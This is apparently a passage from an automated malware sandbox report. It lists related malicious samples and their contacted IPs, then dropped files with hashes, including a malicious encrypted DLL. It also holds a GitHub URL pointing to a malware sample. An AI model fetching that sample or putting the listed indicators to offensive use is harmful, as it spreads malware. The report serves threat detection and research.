                                                                                                                                                                      • 140.82.121.4
                                                                                                                                                                      SecuriteInfo.com.Trojan.Agent.GMXD.11819.15970.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                      • 140.82.121.4
                                                                                                                                                                      General Agreement.docx.exeGet hashmaliciousPython Stealer, Babadeda, Exela Stealer, Waltuhium GrabberBrowse
                                                                                                                                                                      • 140.82.121.3
                                                                                                                                                                      https://github.com/Matty77o/malware-samples-m-h/raw/refs/heads/main/TheTrueFriend.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                      • 140.82.121.3
                                                                                                                                                                      https://github.com/Matty77o/malware-samples-m-h/raw/refs/heads/main/TheTrueFriend.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                      • 140.82.121.4
                                                                                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                      TELEGRAMRUna.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                                      • 149.154.167.220
                                                                                                                                                                      na.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                                      • 149.154.167.220
                                                                                                                                                                      na.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                                      • 149.154.167.220
                                                                                                                                                                      na.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                                      • 149.154.167.220
                                                                                                                                                                      file.exeGet hashmaliciousWhiteSnake StealerBrowse
                                                                                                                                                                      • 149.154.167.220
                                                                                                                                                                      ADJUNTA.vbsGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                                                                      • 149.154.167.220
                                                                                                                                                                      Request For Quotation-RFQ097524.vbsGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                                                                      • 149.154.167.220
                                                                                                                                                                      Request For Quotation-RFQ097524_Pdf.vbsGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                                                                      • 149.154.167.220
                                                                                                                                                                      Request For Quotation-RFQ097524.vbsGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                                                                      • 149.154.167.220
                                                                                                                                                                      Pedido de Cota#U00e7#U00e3o -RFQ20241029.vbsGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                                                                      • 149.154.167.220
                                                                                                                                                                      GOOGLE-AS-APGoogleAsiaPacificPteLtdSGfile.exeGet hashmaliciousCredential FlusherBrowse
                                                                                                                                                                      • 34.117.188.166
                                                                                                                                                                      file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, StealcBrowse
                                                                                                                                                                      • 34.117.188.166
                                                                                                                                                                      file.exeGet hashmaliciousCredential FlusherBrowse
                                                                                                                                                                      • 34.117.188.166
                                                                                                                                                                      file.exeGet hashmaliciousCredential FlusherBrowse
                                                                                                                                                                      • 34.117.188.166
                                                                                                                                                                      file.exeGet hashmaliciousCredential FlusherBrowse
                                                                                                                                                                      • 34.117.188.166
                                                                                                                                                                      file.exeGet hashmaliciousCredential FlusherBrowse
                                                                                                                                                                      • 34.117.188.166
                                                                                                                                                                      file.exeGet hashmaliciousCredential FlusherBrowse
                                                                                                                                                                      • 34.117.188.166
                                                                                                                                                                      file.exeGet hashmaliciousCredential FlusherBrowse
                                                                                                                                                                      • 34.117.188.166
                                                                                                                                                                      file.exeGet hashmaliciousCredential FlusherBrowse
                                                                                                                                                                      • 34.117.188.166
                                                                                                                                                                      file.exeGet hashmaliciousCredential FlusherBrowse
                                                                                                                                                                      • 34.117.188.166
                                                                                                                                                                      GITHUBUSfile.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, StealcBrowse
                                                                                                                                                                      • 140.82.121.3
                                                                                                                                                                      file.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                      • 140.82.121.4
                                                                                                                                                                      file.exeGet hashmaliciousLummaC, Amadey, AsyncRAT, LummaC Stealer, Stealc, XWormBrowse
                                                                                                                                                                      • 140.82.121.3
                                                                                                                                                                      SecuriteInfo.com.Win64.Trojan.Agent.2S9FJA.25494.32016.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                      • 140.82.121.3
                                                                                                                                                                      SecuriteInfo.com.Win64.Trojan.Agent.2S9FJA.25494.32016.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                      • 140.82.121.3
                                                                                                                                                                      SecuriteInfo.com.Trojan.Agent.GMXD.11819.15970.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                      • 140.82.121.4
                                                                                                                                                                      SecuriteInfo.com.Trojan.Agent.GMXD.11819.15970.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                      • 140.82.121.4
                                                                                                                                                                      General Agreement.docx.exeGet hashmaliciousPython Stealer, Babadeda, Exela Stealer, Waltuhium GrabberBrowse
                                                                                                                                                                      • 140.82.121.3
                                                                                                                                                                      https://github.com/Matty77o/malware-samples-m-h/raw/refs/heads/main/TheTrueFriend.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                      • 140.82.121.3
                                                                                                                                                                      https://github.com/Matty77o/malware-samples-m-h/raw/refs/heads/main/TheTrueFriend.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                      • 140.82.121.4
                                                                                                                                                                      HEANETIEwZU2edEGL3.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                      • 136.206.92.56
                                                                                                                                                                      na.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                      • 87.46.74.15
                                                                                                                                                                      la.bot.sh4.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                      • 87.35.64.4
                                                                                                                                                                      la.bot.m68k.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                      • 136.206.146.44
                                                                                                                                                                      la.bot.arm.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                      • 87.39.1.0
                                                                                                                                                                      nabarm5.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                      • 134.226.206.179
                                                                                                                                                                      arm7.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                      • 149.157.218.178
                                                                                                                                                                      la.bot.powerpc.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                      • 157.190.203.83
                                                                                                                                                                      bin.sh.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                      • 87.41.163.240
                                                                                                                                                                      splarm7.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                      • 136.206.236.61
                                                                                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                      bd0bf25947d4a37404f0424edf4db9adSecuriteInfo.com.FileRepMalware.12585.5759.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                      • 8.8.8.8
                                                                                                                                                                      • 140.82.121.4
                                                                                                                                                                      • 185.199.111.133
                                                                                                                                                                      • 34.117.59.81
                                                                                                                                                                      SecuriteInfo.com.Trojan.GenericKD.74444428.17336.1019.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                      • 8.8.8.8
                                                                                                                                                                      • 140.82.121.4
                                                                                                                                                                      • 185.199.111.133
                                                                                                                                                                      • 34.117.59.81
                                                                                                                                                                      SecuriteInfo.com.Trojan.GenericKD.74444428.17336.1019.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                      • 8.8.8.8
                                                                                                                                                                      • 140.82.121.4
                                                                                                                                                                      • 185.199.111.133
                                                                                                                                                                      • 34.117.59.81
                                                                                                                                                                      sadfwqefrqw3f.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                      • 8.8.8.8
                                                                                                                                                                      • 140.82.121.4
                                                                                                                                                                      • 185.199.111.133
                                                                                                                                                                      • 34.117.59.81
                                                                                                                                                                      SecuriteInfo.com.Win64.Evo-gen.20107.17462.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                      • 8.8.8.8
                                                                                                                                                                      • 140.82.121.4
                                                                                                                                                                      • 185.199.111.133
                                                                                                                                                                      • 34.117.59.81
                                                                                                                                                                      SecuriteInfo.com.FileRepMalware.12025.7543.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                      • 8.8.8.8
                                                                                                                                                                      • 140.82.121.4
                                                                                                                                                                      • 185.199.111.133
                                                                                                                                                                      • 34.117.59.81
                                                                                                                                                                      SecuriteInfo.com.Heuristic.HEUR.AGEN.1319832.32667.20795.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                      • 8.8.8.8
                                                                                                                                                                      • 140.82.121.4
                                                                                                                                                                      • 185.199.111.133
                                                                                                                                                                      • 34.117.59.81
                                                                                                                                                                      ActSet.ps1Get hashmaliciousFredy StealerBrowse
                                                                                                                                                                      • 8.8.8.8
                                                                                                                                                                      • 140.82.121.4
                                                                                                                                                                      • 185.199.111.133
                                                                                                                                                                      • 34.117.59.81
                                                                                                                                                                      ActSet.ps1Get hashmaliciousFredy StealerBrowse
                                                                                                                                                                      • 8.8.8.8
                                                                                                                                                                      • 140.82.121.4
                                                                                                                                                                      • 185.199.111.133
                                                                                                                                                                      • 34.117.59.81
                                                                                                                                                                      SecuriteInfo.com.Win32.CrypterX-gen.13288.14467.dllGet hashmaliciousUnknownBrowse
                                                                                                                                                                      • 8.8.8.8
                                                                                                                                                                      • 140.82.121.4
                                                                                                                                                                      • 185.199.111.133
                                                                                                                                                                      • 34.117.59.81
                                                                                                                                                                      74954a0c86284d0d6e1c4efefe92b521SecuriteInfo.com.Variant.Lazy.618554.7337.5785.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                      • 8.8.8.8
                                                                                                                                                                      • 140.82.121.4
                                                                                                                                                                      • 185.199.111.133
                                                                                                                                                                      • 34.117.59.81
                                                                                                                                                                      bat2.batGet hashmaliciousUnknownBrowse
                                                                                                                                                                      • 8.8.8.8
                                                                                                                                                                      • 140.82.121.4
                                                                                                                                                                      • 185.199.111.133
                                                                                                                                                                      • 34.117.59.81
                                                                                                                                                                      ufW7CDPEZ5.lnkGet hashmaliciousUnknownBrowse
                                                                                                                                                                      • 8.8.8.8
                                                                                                                                                                      • 140.82.121.4
                                                                                                                                                                      • 185.199.111.133
                                                                                                                                                                      • 34.117.59.81
                                                                                                                                                                      BcsUcRnDGx.lnkGet hashmaliciousUnknownBrowse
                                                                                                                                                                      • 8.8.8.8
                                                                                                                                                                      • 140.82.121.4
                                                                                                                                                                      • 185.199.111.133
                                                                                                                                                                      • 34.117.59.81
                                                                                                                                                                      41PbtwTtt7.lnkGet hashmaliciousUnknownBrowse
                                                                                                                                                                      • 8.8.8.8
                                                                                                                                                                      • 140.82.121.4
                                                                                                                                                                      • 185.199.111.133
                                                                                                                                                                      • 34.117.59.81
                                                                                                                                                                      f7goD45EHo.lnkGet hashmaliciousUnknownBrowse
                                                                                                                                                                      • 8.8.8.8
                                                                                                                                                                      • 140.82.121.4
                                                                                                                                                                      • 185.199.111.133
                                                                                                                                                                      • 34.117.59.81
                                                                                                                                                                      W4x0CDQAiw.lnkGet hashmaliciousUnknownBrowse
                                                                                                                                                                      • 8.8.8.8
                                                                                                                                                                      • 140.82.121.4
                                                                                                                                                                      • 185.199.111.133
                                                                                                                                                                      • 34.117.59.81
                                                                                                                                                                      oP7CbGHVDZ.lnkGet hashmaliciousUnknownBrowse
                                                                                                                                                                      • 8.8.8.8
                                                                                                                                                                      • 140.82.121.4
                                                                                                                                                                      • 185.199.111.133
                                                                                                                                                                      • 34.117.59.81
                                                                                                                                                                      f4Ghw1L3EH.lnkGet hashmaliciousUnknownBrowse
                                                                                                                                                                      • 8.8.8.8
                                                                                                                                                                      • 140.82.121.4
                                                                                                                                                                      • 185.199.111.133
                                                                                                                                                                      • 34.117.59.81
                                                                                                                                                                      4pzJGIIsej.lnkGet hashmaliciousUnknownBrowse
                                                                                                                                                                      • 8.8.8.8
                                                                                                                                                                      • 140.82.121.4
                                                                                                                                                                      • 185.199.111.133
                                                                                                                                                                      • 34.117.59.81
                                                                                                                                                                      3b5074b1b5d032e5620f69f9f700ff0eINQ-40152.scrGet hashmaliciousUnknownBrowse
                                                                                                                                                                      • 149.154.167.220
                                                                                                                                                                      • 140.82.121.4
                                                                                                                                                                      • 185.199.111.133
                                                                                                                                                                      Shipping documents 00039984849900044800.exeGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                                                                                                                                      • 149.154.167.220
                                                                                                                                                                      • 140.82.121.4
                                                                                                                                                                      • 185.199.111.133
                                                                                                                                                                      z1Transaction_ID_REF2418_cmd.batGet hashmaliciousAgentTesla, DBatLoader, PureLog StealerBrowse
                                                                                                                                                                      • 149.154.167.220
                                                                                                                                                                      • 140.82.121.4
                                                                                                                                                                      • 185.199.111.133
                                                                                                                                                                      greatthingswithmegood.htaGet hashmaliciousCobalt Strike, HTMLPhisherBrowse
                                                                                                                                                                      • 149.154.167.220
                                                                                                                                                                      • 140.82.121.4
                                                                                                                                                                      • 185.199.111.133
                                                                                                                                                                      file.exeGet hashmaliciousWhiteSnake StealerBrowse
                                                                                                                                                                      • 149.154.167.220
                                                                                                                                                                      • 140.82.121.4
                                                                                                                                                                      • 185.199.111.133
                                                                                                                                                                      Reff_Yazaki-europe_575810710108_ZnjKTIejsM.htmlGet hashmaliciousUnknownBrowse
                                                                                                                                                                      • 149.154.167.220
                                                                                                                                                                      • 140.82.121.4
                                                                                                                                                                      • 185.199.111.133
                                                                                                                                                                      ADJUNTA.vbsGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                                                                      • 149.154.167.220
                                                                                                                                                                      • 140.82.121.4
                                                                                                                                                                      • 185.199.111.133
                                                                                                                                                                      File07098.PDF.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                                                                      • 149.154.167.220
                                                                                                                                                                      • 140.82.121.4
                                                                                                                                                                      • 185.199.111.133
                                                                                                                                                                      Payment Slip_SJJ023639#U00faPDF.scr.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                                                                      • 149.154.167.220
                                                                                                                                                                      • 140.82.121.4
                                                                                                                                                                      • 185.199.111.133
                                                                                                                                                                      Quality stuff.pdf.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                                                                      • 149.154.167.220
                                                                                                                                                                      • 140.82.121.4
                                                                                                                                                                      • 185.199.111.133
                                                                                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                      C:\Windows \System32\printui.exeprintui.dllGet hashmaliciousUnknownBrowse
                                                                                                                                                                        SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                          F.7zGet hashmaliciousUnknownBrowse
                                                                                                                                                                            Ld0f3NDosJ.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                              File Type:PE32+ executable (DLL) (GUI) x86-64 (stripped to external PDB), for MS Windows
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):14624256
                                                                                                                                                                              Entropy (8bit):7.9999055956810405
                                                                                                                                                                              Encrypted:true
                                                                                                                                                                              SSDEEP:393216:IZNnGPX9yS3g2vfY4xvaicUK7t8gQQbEvfSqReJTq:IznGPNyF2HnxnbKFQvqGeR
                                                                                                                                                                              MD5:E56812B3C7159AEBC1C64DD4B852DDAA
                                                                                                                                                                              SHA1:6F63556A9B90BBC541E8CDE4E485A997FB7F9431
                                                                                                                                                                              SHA-256:11145DF0F89A03C64DA18B6451F34187EAEE3D1B452ECFC96E1AC9C74EA28695
                                                                                                                                                                              SHA-512:FDB49C70FC99D2F00D56C87ACC3292515843814D3E1B9CF666464BB1C7B3A684A3D4488E8726F50ED99B4434F83902269F9A7064525CC473393E410683FA60ED
                                                                                                                                                                              Malicious:true
                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d.....!g..........."...'.B..."...... ..........E.....................................O....`... ......................................`..^....p..P............0.............................................. *..(....................r...............................text....A.......B..................`..`.data...p....`.......F..............@....rdata....... ......................@..@.pdata.......0......................@..@.xdata.......@......................@..@.bss....0....P...........................edata..^....`......................@..@.idata..P....p......................@....CRT....X............ ..............@....tls................."..............@....reloc...............$..............@..B........................................................................................................................................................................
                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                              File Type:data
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):9434
                                                                                                                                                                              Entropy (8bit):4.928515784730612
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:192:Lxoe5qpOZxoe54ib4ZVsm5emdrgkjDt4iWN3yBGHVQ9smzdcU6Cj9dcU6CG9smAH:srib4ZIkjh4iUxsT6Ypib47
                                                                                                                                                                              MD5:D3594118838EF8580975DDA877E44DEB
                                                                                                                                                                              SHA1:0ACABEA9B50CA74E6EBAE326251253BAF2E53371
                                                                                                                                                                              SHA-256:456A877AFDD786310F7DAF74CCBC7FB6B0A0D14ABD37E3D6DE9D8277FFAC7DDE
                                                                                                                                                                              SHA-512:103EA89FA5AC7E661417BBFE049415EF7FA6A09C461337C174DF02925D6A691994FE91B148B28D6A712604BDBC4D1DB5FEED8F879731B36326725AA9714AC53C
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Preview:PSMODULECACHE......)..z..S...C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script.........&ug.z..C...C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\Pester.psd1........Describe........Get-TestDriveItem........New-Fixture........In........Invoke-Mock........InModuleScope........Mock........SafeGetCommand........Af
                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                              File Type:data
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):1752
                                                                                                                                                                              Entropy (8bit):5.661699742751884
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:48:VSU4xymI4RfoUeCa+m9qr9tK8NLHfuPx5jl+yPW9SGyU:sHxvIIwLz9qr2KLHmP3ZvW9SjU
                                                                                                                                                                              MD5:94B79C976D32CDC128907E1DB545CF06
                                                                                                                                                                              SHA1:739F33ED4CD84DF3D74C7A6A15D2EC714422E9BD
                                                                                                                                                                              SHA-256:BEC79884369677DA3D5C5DB7BAE907FB34CF7A602D5B90ADABAE63FAE1F3CF9D
                                                                                                                                                                              SHA-512:15BFA3AC855B32D019C09FF0A57C4E05375863B62B06CE0F779856C321AB905E2D39F10B7B0C84D9918B4647D606E31C467080E303DF65B75092E2693384B2F4
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Preview:@...e...........................................................@...............M6.]..O....PI.&%.......System.Web.Extensions...H...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.Automation<...............i..VdqF...|...........System.Configuration4.................%...K... ...........System.Xml..L.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices8..................1...L..U;V.<}........System.Numerics.4.................0..~.J.R...L........System.Data.H................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...<................$@...J....M+.B........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Commands.Utility...
                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):60
                                                                                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):60
                                                                                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):60
                                                                                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):60
                                                                                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):60
                                                                                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):60
                                                                                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):60
                                                                                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):60
                                                                                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):60
                                                                                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):60
                                                                                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
